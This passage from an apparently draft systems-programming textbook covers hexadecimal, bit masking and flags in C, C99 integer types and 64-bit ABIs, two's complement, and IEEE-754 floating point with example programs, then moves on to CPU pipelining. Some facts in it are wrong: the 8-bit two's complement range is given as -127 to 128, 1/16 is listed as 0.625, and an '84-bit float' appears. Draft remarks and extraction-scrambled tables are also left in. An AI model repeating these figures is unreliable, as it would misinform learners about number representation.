our every day number system. But base 10 does not work well with binary -- to represent 10 different
elements in binary, we need four bits. Four bits, however, gives us sixteen possible combinations. So we
can either take the very tricky road of trying to convert between base 10 and binary, or take the easy road
and make up a base 16 number system -- hexadecimal!
Hexadecimal uses the standard base 10 numerals, but adds A B C D E F  which refer to 10 11 12
13 14 15  (n.b. we start from zero).
Traditionally, any time you see a number prefixed by 0x this will denote a hexadecimal number.
As mentioned, to represent 16 different patterns in binary, we would need exactly four bits. Therefore,
each hexadecimal numeral represents exactly four bits. You should consider it an exercise to learn the
following table off by heart.
Table 2.11. Hexadecimal, Binary and Decimal
Hexadecimal Binary Decimal
0 0000 0
1 0001 1
2 0010 2
3 0011 3
4 0100 4
5 0101 5
6 0110 6
7 0111 7
8 1000 8
9 1001 9
A 1010 10
B 1011 11
Binary and Number Representation
17Hexadecimal Binary Decimal
C 1100 12
D 1101 13
E 1110 14
F 1111 15
Of course there is no reason not to continue the pattern (say, assign G to the value 16), but 16 values is
an excellent trade off between the vagaries of human memory and the number of bits used by a computer
(occasionally you will also see base 8 used, for example for file permissions under UNIX). We simply
represent larger numbers of bits with more numerals. For example, a sixteen bit variable can be represented
by 0xAB12, and to find it in binary simply take each individual numeral, convert it as per the table and
join them all together (so 0xAB12 ends up as the 16-bit binary number 1010101100010010 ). We can
use the reverse to convert from binary back to hexadecimal.
We can also use the same repeated division scheme to change the base of a number. For example, to find
203 in hexadecimal
Table 2.12. Convert 203 to hexadecimal
Quotient Remainder
20310 ÷ 16 = 12 11 (0xB)
1210 ÷ 16 = 0 12 (0xC)↑
Hence 203 in hexadecimal is 0xCB.
Practical Implications
Use of binary in code
Whilst binary is the underlying language of every computer, it is entirely practical to program a computer
in high level languages without knowing the first thing about it. However, for the low level code we are
interested in a few fundamental binary principles are used repeatedly.
Masking and Flags
Masking
In low level code, it is often important to keep your structures and variables as space efficient as possible.
In some cases, this can involve effectively packing two (generally related) variables into one.
Remember each bit represents two states, so if we know a variable only has, say, 16 possible states it can
be represented by 4 bits (i.e. 24=16 unique values). But the smallest type we can declare in C is 8 bits (a
char), so we can either waste four bits, or find some way to use those left over bits.
We can easily do this by the process of masking. Remembering the rules of the logical operations, it should
become clear how the values are extracted.
The process is illustrated in the figure below. We are interested in the lower four bits, so set our mask to
have these bits set to 1. Since the logical and  operation will only set the bit if both bits are 1, those
bits of the mask set to 0 effectively hide the bits we are not interested in.
Binary and Number Representation
18Figure 2.1. Masking
1111 0000 0x0F
&&&&&&&&1 10100 01
00000 01 10x05
To get the top (blue) four bits, we would invert the mask. You will note this gives a result of 0x90 when
really we want a value of 0x09. To get the bits into the right position we use the right shift  operation.
Setting the bits requires the logical or  operation. However, rather than using 1's as the mask, we
use 0's. You should draw a diagram similar to the above figure and work through setting bits with the
logical or  operation.
Flags
Often a program will have a large number of variables that only exist as flags to some condition. For
example, a state machine is an algorithm that transitions through a number of different states but may
only be in one at a time. Say it has 8 different states; we could easily declare 8 different variables, one
for each state. But in many cases it is better to declare one 8 bit variable  and assign each bit to flag flag
a particular state.
Flags are a special case of masking, but each bit represents a particular boolean state (on or off). An n bit
variable can hold n different flags. See the code example below for a typical example of using flags -- you
will see variations on this basic code very often.
Example 2.1. Using flags
  1 
                  #include <stdio.h>
    
    // define all 8 possible flags for an 8 bit variable
  5 //      name  hex     binary
    #define FLAG1 0x01 // 00000001
    #define FLAG2 0x02 // 00000010
    #define FLAG3 0x04 // 00000100
    #define FLAG4 0x08 // 00001000
 10 // ... and so on
    #define FLAG8 0x80 // 10000000
    
Binary and Number Representation
19    int main(int argc, char *argv[])
    {
 15  char flags = 0; //an 8 bit variable
     
     // set flags with a logical or
     flags = flags | FLAG1; //set flag 1
     flags = flags | FLAG3; //set flag 3
 20  
     // check flags with a logical and.  If the flag is set (1)
     // then the logical and will return 1, causing the if
     // condition to be true.
     if (flags & FLAG1)
 25   printf("FLAG1 set!\n");
    
     // this of course will be untrue.
     if (flags & FLAG8)
      printf("FLAG8 set!\n");
 30 
     // check multiple flags by using a logical or
     // this will pass as FLAG1 is set
     if (flags & (FLAG1|FLAG4))
      printf("FLAG1 or FLAG4 set!\n");
 35 
     return 0;
    }
    
                
Types and Number Representation
C Standards
Although a slight divergence, it is important to understand a bit of history about the C language.
C is the lingua franca  of the systems programming world. Every operating system and its associated system
libraries in common use is written in C, and every system provides a C compiler. To stop the language
diverging across each of these systems where each would be sure to make numerous incompatible changes,
a strict standard has been written for the language.
Officially this standard is known as ISO/IEC 9899:1999(E), but is more commonly referred to by its
shortened name C99. The standard is maintained by the International Standards Organisation (ISO) and
the full standard is available for purchase online. Older standards versions such as C89 (the predecessor
to C99 released in 1989) and ANSI C are no longer in common usage and are encompassed within the
latest standard. The standard documentation is very technical, and details most every part of the language.
For example it explains the syntax (in Backus Naur form), standard #define  values and how operations
should behave.
It is also important to note what the C standards does not define. Most importantly the standard needs to be
appropriate for every architecture, both present and future. Consequently it takes care not to define areas
that are architecture dependent. The "glue" between the C standard and the underlying architecture is the
Application Binary Interface (or ABI) which we discuss below. In several places the standard will mention
that a particular operation or construct has an unspecified or implementation dependent result. Obviously
the programmer can not depend on these outcomes if they are to write portable code.
Binary and Number Representation
20GNU C
The GNU C Compiler, more commonly referred to as gcc, almost completely implements the C99 standard.
However it also implements a range of extensions to the standard which programmers will often use to
gain extra functionality, at the expense of portability to another compiler. These extensions are usually
related to very low level code and are much more common in the system programming field; the most
common extension being used in this area being inline assembly code. Programmers should read the gcc
documentation and understand when they may be using features that diverge from the standard.
gcc can be directed to adhere strictly to the standard (the -std=c99  flag for example) and warn or create
an error when certain things are done that are not in the standard. This is obviously appropriate if you need
to ensure that you can move your code easily to another compiler.
Types
As programmers, we are familiar with using variables to represent an area of memory to hold a value. In a
typed language, such as C, every variable must be declared with a type. The type tells the compiler about
what we expect to store in a variable; the compiler can then both allocate sufficient space for this usage
and check that the programmer does not violate the rules of the type. In the example below, we see an
example of the space allocated for some common types of variables.
Binary and Number Representation
21Figure 2.2. Types
\0h
e
l
l
oint achar c
int b[2]
char *h = "hello"1 byte
4 bytes
6 bytes2 x 4 bytes
b[1] | *(b+1)b[0] | *b
System Memory
The C99 standard purposely only mentions the smallest possible size of each of the types defined for C.
This is because across different processor architectures and operating systems the best size for types can
be wildly different.
To be completely safe programmers need to never assume the size of any of their variables, however a
functioning system obviously needs agreements on what sizes types are going to be used in the system.
Each architecture and operating system conforms to an Application Binary Interface  or ABI. The ABI for
a system fills in the details between the C standard and the requirements of the underlying hardware and
operating system. An ABI is written for a specific processor and operating system combination.
Binary and Number Representation
22Table 2.13. Standard Integer Types and Sizes
Type C99 minimum size (bits) Common size (32 bit
architecture)
char 8 8
short 16 16
int 16 32
long 32 32
long long 64 64
Pointers Implementation dependent 32
Above we can see the only divergence from the standard is that int is commonly a 32 bit quantity, which
is twice the strict minimum 16 bit size that the C99 requires.
Pointers are really just an address (i.e. their value is an address and thus "points" somewhere else in
memory) therefore a pointer needs to be sufficient in size to be able to address any memory in the system.
64 bit
One area that causes confusion is the introduction of 64 bit computing. This means that the processor
can handle addresses 64 bits in length (specifically the registers are 64 bits wide; a topic we discuss in
Chapter 3, Computer Architecture ).
This firstly means that all pointers are required to be a 64 bits wide so they can represent any possible
address in the system. However, system implementors must then make decisions about the size of the other
types. Two common models are widely used, as shown below.
Table 2.14. Standard Scalar Types and Sizes
Type C99 minimum size
(bits)Common size (LP64) Common size
(Windows)
char 8 8 8
short 16 16 16
int 16 32 32
long 32 64 32
long long 64 64 64
Pointers Implementation
dependent64 64
You can see that in the LP64 (long-pointer 64) model long values are defined to be 64 bits wide. This is
different to the 32 bit model we showed previously. The LP64 model is widely used on UNIX systems.
In the other model, long remains a 32 bit value. This maintains maximum compatibility with 32 code.
This model is in use with 64 bit Windows.
There are good reasons why the size of int was not increased to 64 bits in either model. Consider that
if the size of int is increased to 64 bits you leave programmers no way to obtain a 32 bit variable. The
only possibly is redefining shorts to be a larger 32 bit type.
A 64 bit variable is so large that it is not generally required to represent many variables. For example,
loops very rarely repeat more times than would fit in a 32 bit variable (4294967296 times!). Images usually
Binary and Number Representation
23are usually represented with 8 bits for each of a red, green and blue value and an extra 8 bits for extra
(alpha channel) information; a total of 32 bits. Consequently for many cases, using a 64 bit variable will
be wasting at least the top 32 bits (if not more). Not only this, but the size of an integer array has now
doubled too. This means programs take up more system memory (and thus more cache; discussed in detail
in Chapter 3, Computer Architecture ) for no real improvement. For the same reason Windows elected
to keep their long values as 32 bits; since much of the Windows API was originally written to use long
variables on a 32 bit system and hence does not require the extra bits this saves considerable wasted space
in the system without having to re-write all the API.
If we consider the proposed alternative where short was redefined to be a 32 bit variable; programmers
working on a 64 bit system could use it for variables they know are bounded to smaller values. However,
when moving back to a 32 bit system their same short variable would now be only 16 bits long, a value
which is much more realistically overflowed (65536).
By making a programmer request larger variables when they know they will be needed strikes a balance
with respect to portability concerns and wasting space in binaries.
Type qualifiers
The C standard also talks about some qualifiers for variable types. For example const means that a
variable will never be modified from its original value and volatile  suggests to the compiler that this
value might change outside program execution flow so the compiler must be careful not to re-order access
to it in any way.
signed and unsigned  are probably the two most important qualifiers; and they say if a variable can
take on a negative value or not. We examine this in more detail below.
Qualifiers are all intended to pass extra information about how the variable will be used to the compiler.
This means two things; the compiler can check if you are violating your own rules (e.g. writing to a const
value) and it can make optimisations based upon the extra knowledge (examined in later chapters).
Standard Types
C99 realises that all these rules, sizes and portability concerns can become very confusing very quickly.
To help, it provides a series of special types which can specify the exact properties of a variable. These are
defined in <stdint.h>  and have the form qtypes_t  where q is a qualifier, type is the base type, s
is the width in bits and _t is an extension so you know you are using the C99 defined types.
So for example uint8_t  is an unsigned integer exactly 8 bits wide. Many other types are defined; the
complete list is detailed in C99 17.8 or (more cryptically) in the header file. 1
It is up to the system implementing the C99 standard to provide these types for you by mapping them to
appropriate sized types on the target system; on Linux these headers are provided by the system libraries.
Types in action
Below we see an example of how types place restrictions on what operations are valid for a variable, and
how the compiler can use this information to warn when variables are used in an incorrect fashion. In this
code, we firstly assign an integer value into a char variable. Since the char variable is smaller, we loose
the correct value of the integer. Further down, we attempt to assign a pointer to a char to memory we
designated as an integer . This operation can be done; but it is not safe. The first example is run on a 32-
1Note that C99 also has portability helpers for printf. The PRI macros in <inttypes.h>  can be used as specifiers for types of specified sizes.
Again see the standard or pull apart the headers for full information.
Binary and Number Representation
24bit Pentium machine, and the correct value is returned. However, as shown in the second example, on a 64-
bit Itanium machine a pointer is 64 bits (8 bytes) long, but an integer is only 4 bytes long. Clearly, 8 bytes
can not fit into 4! We can attempt to "fool" the compiler by casting the value before assigning it; note that in
this case we have shot ourselves in the foot by doing this cast and ignoring the compiler warning since the
smaller variable can not hold all the information from the pointer and we end up with an invalid address.
Example 2.2. Example of warnings when types are not matched
  1 
                  $ cat types.c
    #include <stdio.h>
    #include <stdint.h>
  5 
    int main(void)
    {
            char *c;
            int i;
 10 
            i = c;
            i = (int)c;
    
            return 0;
 15 }
    
    $ uname -m
    i686
    
 20 $ gcc -Wall -o types types.c
    types.c: In function 'main':
    types.c:19: warning: assignment makes integer from pointer without a cast
    
    $ ./types
 25 i is 52
    p is 0x80484e8
    p is 0x80484e8
    
    $ uname -m
 30 ia64
    
    $ gcc -Wall  -o types types.c
    types.c: In function 'main':
    types.c:19: warning: assignment makes integer from pointer without a cast
 35 types.c:21: warning: cast from pointer to integer of different size
    types.c:22: warning: cast to pointer from integer of different size
    
    $ ./types
    i is 52
 40 p is 0x40000000000009e0
    p is 0x9e0
    
                
Binary and Number Representation
25Number Representation
Negative Values
With our modern base 10 numeral system we indicate a negative number by placing a minus ( -) sign in
front of it. When using binary we need to use a different system to indicate negative numbers.
There is only one scheme in common use on modern hardware, but C99 defines three acceptable methods
for negative value representation.
Sign Bit
The most straight forward method is to simply say that one bit of the number indicates either a negative
or positive value depending on it being set or not.
This is analogous to mathematical approach of having a + and -. This is fairly logical, and some of the
original computers did represent negative numbers in this way. But using binary numbers opens up some
other possibilities which make the life of hardware designers easier.
However, notice that the value 0 now has two equivalent values; one with the sign bit set and one without.
Sometimes these values are referred to as +0 and -0 respectively.
One's Complement
One's complement simply applies the not operation to the positive number to represent the negative
number. So, for example the value -90 (-0x5A) is represented by ~01011010 = 101001012
With this scheme the biggest advantage is that to add a negative number to a positive number no special
logic is required, except that any additional carry left over must be added back to the final value. Consider
Table 2.15. One's Complement Addition
Decimal Binary Op
-90 10100101 +
100 01100100
--- --------
10100001001 9
00001010 10
If you add the bits one by one, you find you end up with a carry bit at the end (highlighted above). By
adding this back to the original we end up with the correct value, 10
Again we still have the problem with two zeros being represented. Again no modern computer uses one's
complement, mostly because there is a better scheme.
Two's Complement
Two's complement is just like one's complement, except the negative representation has one added to
it and we discard any left over carry bit. So to continue with the example from before, -90 would be
~01011010+1=10100101+1 = 10100110 .
2The ~ operator is the C language operator to apply NOT to the value. It is also occasionally called the one's complement operator, for obvious
reasons now!
Binary and Number Representation
26This means there is a slightly odd symmetry in the numbers that can be represented; for example with
an 8 bit integer we have 2^8 = 256  possible values; with our sign bit representation we could
represent -127 thru 127 but with two's complement we can represent -127 thru 128. This is because
we have removed the problem of having two zeros; consider that "negative zero" is (~00000000
+1)=(11111111+1)=00000000  (note discarded carry bit).
Table 2.16. Two's Complement Addition
Decimal Binary Op
-90 10100110 +
100 01100100
--- --------
10 00001010
You can see that by implementing two's complement hardware designers need only provide logic for
addition circuits; subtraction can be done by two's complement negating the value to be subtracted and
then adding the new value.
Similarly you could implement multiplication with repeated addition and division with repeated
subtraction. Consequently two's complement can reduce all simple mathematical operations down to
addition!
All modern computers use two's complement representation.
Sign-extension
Becuase of two's complement format, when increasing the size of signed value, it is important that the
additional bits be sign-extended ; that is, copied from the top-bit of the existing value.
For example, the value of an 32-bit int -10 would be represented in two's complement binary as
11111111111111111111111111110110 . If one were to cast this to a 64-bit long long int ,
we would need to ensure that the additional 32-bits were set to 1 to maintain the same sign as the original.
Thanks to two's complement, it is sufficient to take the top bit of the exiting value and replace all the
added bits with this value. This processes is referred to as sign-extension  and is usually handled by the
compiler in situations as defined by the language standard, with the processor generally providing special
instructions to take a value an sign-extended it to some larger value.
Floating Point
So far we have only discussed integer or whole numbers; the class of numbers that can represent decimal
values is called floating point .
To create a decimal number, we require some way to represent the concept of the decimal place in binary.
The most common scheme for this is known as the IEEE-754 floating point standard  because the standard
is published by the Institute of Electric and Electronics Engineers. The scheme is conceptually quite simple
and is somewhat analogous to "scientific notation".
In scientific notation the value 123.45 might commonly be represented as 1.2345x102. We call
1.2345 the mantissa or significand , 10 is the radix and 2 is the exponent.
In the IEEE floating point model, we break up the available bits to represent the sign, mantissa and exponent
of a decimal number. A decimal number is represented by sign × significand × 2^exponent.
The sign bit equates to either 1 or -1. Since we are working in binary, we always have the implied radix
of 2.
Binary and Number Representation
27There are differing widths for a floating point value -- we examine below at only a 32 bit value. More
bits allows greater precision.
Table 2.17. IEEE Floating Point
Sign Exponent Significand/Mantissa
S EEEEEEEE MMMMMMMMMMMMMMMMMMMMMMM
The other important factor is bias of the exponent. The exponent needs to be able to represent both positive
and negative values, thus an implied value of 127 is subtracted from the exponent. For example, an
exponent of 0 has an exponent field of 127, 128 would represent 1 and 126 would represent -1.
Each bit of the significand adds a little more precision to the values we can represent. Consider the scientific
notation representation of the value 198765. We could write this as 1.98765x106, which corresponds
to a representation below
Table 2.18. Scientific Notation for 1.98765x10^6
100. 10-110-210-310-410-5
1 . 9 8 7 6 5
Each additional digit allows a greater range of decimal values we can represent. In base 10, each digit
after the decimal place increases the precision of our number by 10 times. For example, we can represent
0.0 through 0.9 (10 values) with one digit of decimal place, 0.00 through 0.99 (100 values) with two
digits, and so on. In binary, rather than each additional digit giving us 10 times the precision, we only get
two times the precision, as illustrated in the table below. This means that our binary representation does
not always map in a straight-forward manner to a decimal representation.
Table 2.19. Significands in binary
20. 2-12-22-32-42-5
1 . 1/2 1/4 1/8 1/16 1/32
1 . 0.5 0.25 0.125 0.625 0.03125
With only one bit of precision, our fractional precision is not very big; we can only say that the fraction
is either 0 or 0.5. If we add another bit of precision, we can now say that the decimal value is
one of either 0,0.25,0.5,0.75 . With another bit of precision we can now represent the values
0,0.125,0.25,0.375,0.5,0.625,0.75,0.875 .
Increasing the number of bits therefore allows us greater and greater precision. However, since the range
of possible numbers is infinite we will never have enough bits to represent any possible value.
For example, if we only have two bits of precision and need to represent the value 0.3 we can only say
that it is closest to 0.25; obviously this is insufficient for most any application. With 22 bits of significand
we have a much finer resolution, but it is still not enough for most applications. A double value increases
the number of significand bits to 52 (it also increases the range of exponent values too). Some hardware
has an 84-bit float, with a full 64 bits of significand. 64 bits allows a tremendous precision and should
be suitable for all but the most demanding of applications (XXX is this sufficient to represent a length to
less than the size of an atom?)
Example 2.3. Floats versus Doubles
  1 
                  $ cat float.c
    #include <stdio.h>
Binary and Number Representation
28    
  5 int main(void)
    {
            float a = 0.45;
            float b = 8.0;
    
 10         double ad = 0.45;
            double bd = 8.0;
    
            printf("float+float, 6dp    : %f\n", a+b);
            printf("double+double, 6dp  : %f\n", ad+bd);
 15         printf("float+float, 20dp   : %10.20f\n", a+b);
            printf("dobule+double, 20dp : %10.20f\n", ad+bd);
    
            return 0;
    }
 20 
    $ gcc -o float float.c
    
    $ ./float
    float+float, 6dp    : 8.450000
 25 double+double, 6dp  : 8.450000
    float+float, 20dp   : 8.44999998807907104492
    dobule+double, 20dp : 8.44999999999999928946
    
    $ python
 30 Python 2.4.4 (#2, Oct 20 2006, 00:23:25)
    [GCC 4.1.2 20061015 (prerelease) (Debian 4.1.1-16.1)] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> 8.0 + 0.45
    8.4499999999999993
 35 
    
                
A practical example is illustrated above. Notice that for the default 6 decimal places of precision given by
printf both answers are the same, since they are rounded up correctly. However, when asked to give
the results to a larger precision, in this case 20 decimal places, we can see the results start to diverge. The
code using doubles  has a more accurate result, but it is still not exactly correct. We can also see that
programmers not explicitly dealing with float values still have problems with precision of variables!
Normalised Values
In scientific notation, we can represent a value in many different ways. For example, 10023x10^0 =
1002.3x101 = 100.23x102. We thus define the normalised  version as the one where 1/radix
<= significand < 1 . In binary this ensures that the leftmost bit of the significand is always one .
Knowing this, we can gain an extra bit of precision by having the standard say that the leftmost bit being
one is implied.
Table 2.20. Example of normalising 0.375
20. 2-12-22-32-42-5Exponent Calculation
0 . 0 1 1 0 0 2^0(0.25+0.125)
× 1 = 0.375
Binary and Number Representation
2920. 2-12-22-32-42-5Exponent Calculation
0 . 1 1 0 0 0 2^-1(0.5+0.25)×.5=0.375
1 . 1 0 0 0 0 2^-2(1+0.5)×0.25=0.375
As you can see above, we can make the value normalised by moving the bits upwards as long as we
compensate by increasing the exponent.
Normalisation Tricks
A common problem programmers face is finding the first set bit in a bitfield. Consider the bitfield 0100;
from the right the first set bit would be bit 2 (starting from zero, as is conventional).
The standard way to find this value is to shift right, check if the uppermost bit is a 1 and either terminate
or repeat. This is a slow process; if the bitfield is 64 bits long and only the very last bit is set, you must
go through all the preceeding 63 bits!
However, if this bitfield value were the signficand of a floating point number and we were to normalise
it, the value of the exponent would tell us how many times it was shifted. The process of normalising
a number is generally built into the floating point hardware unit on the processor, so operates very fast;
usually much faster than the repeated shift and check operations.
The example program below illustrates two methods of finding the first set bit on an Itanium processor.
The Itanium, like most server processors, has support for an 80-bit extended floating point type, with a
64-bit significand. This means a unsigned long  neatly fits into the significand of a long double .
When the value is loaded it is normalised, and and thus by reading the exponent value (minus the 16 bit
bias) we can see how far it was shifted.
Example 2.4. Program to find first set bit
  1 
                  #include <stdio.h>
    
    int main(void)
  5 {
     //  in binary = 1000 0000 0000 0000
     //  bit num     5432 1098 7654 3210
     int i = 0x8000;
     int count = 0;
 10  while ( !(i & 0x1) ) {
      count ++;
      i = i >> 1;
     }
     printf("First non-zero (slow) is %d\n", count);
 15 
     // this value is normalised when it is loaded
     long double d = 0x8000UL;
     long exp;
    
 20  // Itanium "get floating point exponent" instruction
     asm ("getf.exp %0=%1" : "=r"(exp) : "f"(d));
    
     // note exponent include bias
     printf("The first non-zero (fast) is %d\n", exp - 65535);
 25 
Binary and Number Representation
30    }
    
                
Bringing it together
In the example code below we extract the components of a floating point number and print out the value
it represents. This will only work for a 32 bit floating point value in the IEEE format; however this is
common for most architectures with the float type.
Example 2.5. Examining Floats
  1 
                  #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
  5 
    /* return 2^n */
    int two_to_pos(int n)
    {
     if (n == 0)
 10   return 1;
     return 2 * two_to_pos(n - 1);
    }
    
    double two_to_neg(int n)
 15 {
     if (n == 0)
      return 1;
     return 1.0 / (two_to_pos(abs(n)));
    }
 20 
    double two_to(int n)
    {
     if (n >= 0)
      return two_to_pos(n);
 25  if (n < 0)
      return two_to_neg(n);
     return 0;
    }
    
 30 /* Go through some memory "m" which is the 24 bit significand of a
       floating point number.  We work "backwards" from the bits
       furthest on the right, for no particular reason. */
    double calc_float(int m, int bit)
    {
 35  /* 23 bits; this terminates recursion */
     if (bit > 23)
      return 0;
    
     /* if the bit is set, it represents the value 1/2^bit */
 40  if ((m >> bit) & 1)
      return 1.0L/two_to(23 - bit) + calc_float(m, bit + 1);
    
Binary and Number Representation
31     /* otherwise go to the next bit */
     return calc_float(m, bit + 1);
 45 }
    
    int main(int argc, char *argv[])
    {
     float f;
 50  int m,i,sign,exponent,significand;
    
     if (argc != 2)
     {
      printf("usage: float 123.456\n");
 55   exit(1);
     }
    
     if (sscanf(argv[1], "%f", &f) != 1)
     {
 60   printf("invalid input\n");
      exit(1);
     }
    
     /* We need to "fool" the compiler, as if we start to use casts
 65     (e.g. (int)f) it will actually do a conversion for us.  We
        want access to the raw bits, so we just copy it into a same
        sized variable. */
     memcpy(&m, &f, 4);
    
 70  /* The sign bit is the first bit */
     sign = (m >> 31) & 0x1;
    
     /* Exponent is 8 bits following the sign bit */
     exponent = ((m >> 23) & 0xFF) - 127;
 75 
     /* Significand fills out the float, the first bit is implied
        to be 1, hence the 24 bit OR value below. */
     significand = (m & 0x7FFFFF) | 0x800000;
    
 80  /* print out a power representation */
     printf("%f = %d * (", f, sign ? -1 : 1);
     for(i = 23 ; i >= 0 ; i--)
     {
      if ((significand >> i) & 1)
 85    printf("%s1/2^%d", (i == 23) ? "" : " + ",
              23-i);
     }
     printf(") * 2^%d\n", exponent);
    
 90  /* print out a fractional representation */
     printf("%f = %d * (", f, sign ? -1 : 1);
     for(i = 23 ; i >= 0 ; i--)
     {
      if ((significand >> i) & 1)
 95    printf("%s1/%d", (i == 23) ? "" : " + ",
              (int)two_to(23-i));
Binary and Number Representation
32     }
     printf(") * 2^%d\n", exponent);
    
100  /* convert this into decimal and print it out */
     printf("%f = %d * %.12g * %f\n",
            f,
            (sign ? -1 : 1),
            calc_float(significand, 0),
105         two_to(exponent));
    
     /* do the math this time */
     printf("%f = %.12g\n",
            f,
110         (sign ? -1 : 1) *
            calc_float(significand, 0) *
            two_to(exponent)
      );
    
115  return 0;
    }
    
                
Sample output of the value 8.45, which we previously examined, is shown below.
Example 2.6. Analysis of 8.45
$ ./float 8.45
8.450000 = 1 * (1/2^0 + 1/2^5 + 1/2^6 + 1/2^7 + 1/2^10 + 1/2^11 + 1/2^14 + 1/2^15 + 1/2^18 + 1/2^19 + 1/2^22 + 1/2^23) * 2^3
8.450000 = 1 * (1/1 + 1/32 + 1/64 + 1/128 + 1/1024 + 1/2048 + 1/16384 + 1/32768 + 1/262144 + 1/524288 + 1/4194304 + 1/8388608) * 2^3
8.450000 = 1 * 1.05624997616 * 8.000000
8.450000 = 8.44999980927
From this example, we get some idea of how the inaccuracies creep into our floating point numbers.
33Chapter 3. Computer Architecture
The CPU
Figure 3.1. The CPU
MEMORY
INSTRUCTIONS
R2=LOAD 0x100R1=1000x100 | 100x090 | 0
0x120 | 0
CPU0x110 | 110
R3=ADD R1,R2
STORE 0x110=R3REGISTERS
The CPU performs instructions on values held in registers. This example shows firstly setting the value
of R1 to 100, loading the value from memory location 0x100 into R2, adding the two values together and
placing the result in R3 and finally storing the new value (110) to R4 (for further use).
To greatly simplify, a computer consists of a central processing unit (CPU) attached to memory. The figure
above illustrates the general principle behind all computer operations.
The CPU executes instructions read from memory. There are two categories of instructions
1.Those that load values from memory into registers and store values from registers to memory.
2.Those that operate on values stored in registers. For example adding, subtracting multiplying or dividing
the values in two registers, performing bitwise operations (and, or, xor, etc) or performing other
mathematical operations (square root, sin, cos, tan, etc).
So in the example we are simply adding 100 to a value stored in memory, and storing this new result back
into memory.
Branching
Apart from loading or storing, the other important operation of a CPU is branching . Internally, the CPU
keeps a record of the next instruction to be executed in the instruction pointer . Usually, the instruction
Computer Architecture
34pointer is incremented to point to the next instruction sequentially; the branch instruction will usually
check if a specific register is zero or if a flag is set and, if so, will modify the pointer to a different address.
Thus the next instruction to execute will be from a different part of program; this is how loops and decision
statements work.
For example, a statement like if (x==0)  might be implemented by finding the or of two registers, one
holding x and the other zero; if the result is zero the comparison is true (i.e. all bits of x were zero) and
the body of the statement should be taken, otherwise branch past the body code.
Cycles
We are all familiar with the speed of the computer, given in Megahertz or Gigahertz (millions or thousands
of millions cycles per second). This is called the clock speed  since it is the speed that an internal clock
within the computer pulses.
The pulses are used within the processor to keep it internally synchronised. On each tick or pulse another
operation can be started; think of the clock like the person beating the drum to keep the rower's oars in sync.
Fetch, Decode, Execute, Store
Executing a single instruction consists of a particular cycle of events; fetching, decoding, executing and
storing.
For example, to do the add instruction above the CPU must
1.Fetch : get the instruction from memory into the processor.
2.Decode : internally decode what it has to do (in this case add).
3.Execute : take the values from the registers, actually add them together
4.Store : store the result back into another register. You might also see the term retiring the instruction.
Looking inside a CPU
Internally the CPU has many different sub components that perform each of the above steps, and generally
they can all happen independently of each other. This is analogous to a physical production line, where
there are many stations where each step has a particular task to perform. Once done it can pass the results
to the next station and take a new input to work on.
Computer Architecture
35Figure 3.2. Inside the CPU
StoreLoadFP
* /+ -FPDecode Instruction
Floating Point Register File
AGU ALUSSE/MMX (etc)program code
Integer Register File
Cache
CPU
RAM
The CPU is made up of many different sub-components, each doing a dedicated task.
Figure 3.2, “Inside the CPU”  shows a very simple block diagram illustrating some of the main parts of
a modern CPU.
You can see the instructions come in and are decoded by the processor. The CPU has two main types of
registers, those for integer calculations and those for floating point  calculations. Floating point is a way
of representing numbers with a decimal place in binary form, and is handled differently within the CPU.
MMX (multimedia extension) and SSE (Streaming Single Instruction Multiple Data) or Altivec registers
are similar to floating point registers.
A register file  is the collective name for the registers inside the CPU. Below that we have the parts of the
CPU which really do all the work.
We said that processors are either loading or storing a value into a register or from a register into memory,
or doing some operation on values in registers.
The Arithmetic Logic Unit  (ALU) is the heart of the CPU operation. It takes values in registers and performs
any of the multitude of operations the CPU is capable of. All modern processors have a number of ALUs so
each can be working independently. In fact, processors such as the Pentium have both fast and slow ALUs;
the fast ones are smaller (so you can fit more on the CPU) but can do only the most common operations,
slow ALUs can do all operations but are bigger.
The Address Generation Unit  (AGU) handles talking to cache and main memory to get values into the
registers for the ALU to operate on and get values out of registers back into main memory.
Floating point registers have the same concepts, but use slightly different terminology for their
components.
Computer Architecture
36Pipelining
As we can see above, whilst the ALU is adding registers together is completely separate to the AGU
writing values back to memory, so there is no reason why the CPU can not be doing both at once. We also
have multiple ALUs in the system, each which can be working on separate instructions. Finally the CPU
could be doing some floating point operations with its floating point logic whilst integer instructions are in
flight too. This process is called pipelining1, and a processor that can do this is referred to as a superscalar
architecture . All modern processors are superscalar.
Another analogy might be to think of the pipeline like a hose that is being filled with marbles, except our
marbles are instructions for the CPU. Ideally you will be putting your marbles in one end, one after the
other (one per clock pulse), filling up the pipe. Once full, for each marble (instruction) you push in all the
others will move to the next position and one will fall out the end (the result).
Branch instruction play havoc with this model however, since they may or may not cause execution to
start from a different place. If you are pipelining, you will have to basically guess which way the branch
will go, so you know which instructions to bring into the pipeline. If the CPU has predicted correctly,
everything goes fine!2 Conversely, if the processor has predicted incorrectly it has wasted a lot of time
and has to clear the pipeline and start again.
This process is usually referred to as a pipeline flush  and is analogous to having to stop and empty out
all your marbles from your hose!
Branch Prediction
pipeline flush, predict taken, predict not taken, branch delay slots
Reordering
This bit is crap
In fact, if the CPU is the hose, it is free to reorder the marbles within the hose, as long as they pop out the
end in the same order you put them in. We call this program order  since this is the order that instructions
are given in the computer program.
Figure 3.3. Reorder buffer example
1: r3 = r1 * r2
2: r4 = r2 + r3
3: r7 = r5 * r6
4: r8 = r1 + r7
Consider an instruction stream such as that shown in Figure 3.3, “Reorder buffer example”  Instruction
2 needs to wait for instruction 1 to complete fully before it can start. This means that the pipeline has
to stall as it waits for the value to be calculated. Similarly instructions 3 and 4 have a dependency on
r7. However, instructions 2 and 3 have no dependency  on each other at all; this means they operate on
completely separate registers. If we swap instructions 2 and 3 we can get a much better ordering for the
1In fact, any modern processor has many more than four stages it can pipeline, above we have only shown a very simplified view. The more stages
that can be executed at the same time, the deeper the pipeline.
2Processors such as the Pentium use a trace cache  to keep a track of which way branches are going. Much of the time it can predict which way a
branch will go by remembering its previous result. For example, in a loop that happens 100 times, if you remember the last result of the branch you
will be right 99 times, since only the last time will you actually continue with the program.
Computer Architecture
37pipeline since the processor can be doing useful work rather than waiting for the pipeline to complete to
get the result of a previous instruction.
However, when writing very low level code some instructions may require some security about how
operations are ordered. We call this requirement memory semantics . If you require acquire semantics
this means that for this instruction you must ensure that the results of all previous instructions have been
completed. If you require release semantics you are saying that all instructions after this one must see the
current result. Another even stricter semantic is a memory barrier  or memory fence  which requires that
operations have been committed to memory before continuing.
On some architectures these semantics are guaranteed for you by the processor, whilst on others you must
specify them explicitly. Most programmers do not need to worry directly about them, although you may
see the terms.
